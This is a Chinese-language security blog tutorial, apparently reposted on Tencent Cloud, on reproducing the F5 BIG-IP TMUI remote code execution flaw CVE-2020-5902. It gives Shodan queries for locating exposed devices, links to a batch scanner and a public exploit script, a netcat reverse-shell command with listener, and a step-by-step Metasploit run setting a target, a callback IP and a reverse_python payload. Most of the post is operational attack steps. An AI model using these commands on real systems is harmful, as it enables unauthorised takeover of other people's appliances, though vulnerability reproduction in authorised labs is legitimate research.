前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >漏洞复现 | CVE‐2020‐5902踩坑记

漏洞复现 | CVE‐2020‐5902踩坑记

作者头像
Ms08067安全实验室
发布2020-08-28 10:30:18
8890
发布2020-08-28 10:30:18
举报

本文作者:Taoing(Ms08067实验室 SRSP TEAM小组成员)

0x0:漏洞概述

F5 BIG‐IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。2020年7月1日,F5官方公布流量管理用户界面(TMUI)存在 前台远程执行代码(RCE)漏洞(CVE‐2020‐5902)。攻击者利用该漏洞,构造恶意请求,在未授权的情况下获得目标服务器的权限,实现远程代码执行。

0x1:影响版本范围

代码语言:javascript
复制
F5 BIG‐IP < 15.1.0.4
F5 BIG‐IP < 14.1.2.6
F5 BIG‐IP < 13.1.3.4
F5 BIG‐IP < 12.1.5.2
F5 BIG‐IP < 11.6.5.2

0x2设备检索:

代码语言:javascript
复制
shodan
http.favicon.hash:‐335242539 2、http.title:"BIG‐IP® ;‐ Redirect"

0x3shodan批量脚本:

代码语言:javascript
复制
https://github.com/aqhmal/CVE‐2020‐5902‐Scanner

1.下载脚本后安装库文件, pip3 install ‐r requirements.txt

2.打开脚本文件scanner.py,加入自己shodan key

3.开干 python3 scan.py

0x4漏洞复现:

代码语言:javascript
复制
https://github.com/jas502n/CVE‐2020‐5902
更改CVE‐2020‐5902.py 里的url,然后直接运行 python CVE‐2020‐5902.py。这里我使用的是python2 运行
代码语言:javascript
复制
反弹shell:nc ‐e /bin/bash ip port
监听:nc ‐lvvp port

Msf坑之多:

1.开始我使用wget最后各种问题。直接浏览器下载。拖进msf

代码语言:javascript
复制
https://github.com/rapid7/metasploit‐framework/blob/0417e88ff24bf05b8874c953bd91600f10186ba4/modules/exploits/linux/http/f5_bigip_tmui_rce.rb

2.解决方法:

下载后拖进去

代码语言:javascript
复制
﴾/usr/share/metasploit‐framework/modules/exploits/linux/http/﴿

打开msf依次执行

代码语言:javascript
复制
msfconsole reload_all search f5_bigip
代码语言:javascript
复制
use exploit/linux/http/f5_bigip_tmui_rce
set rhost 1.2.3.4
set lhost 129.204.113.202
set lport 5567
set payload cmd/unix/reverse_python
run

0x5:总结:

坑点:msf最好在云上,虚拟机啥的弹不了

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2020-08-25,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Ms08067安全实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
负载均衡
负载均衡(Cloud Load Balancer,CLB)提供安全快捷的流量分发服务,访问流量经由 CLB 可以自动分配到云中的多台后端服务器上,扩展系统的服务能力并消除单点故障。负载均衡支持亿级连接和千万级并发,可轻松应对大流量访问,满足业务需求。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档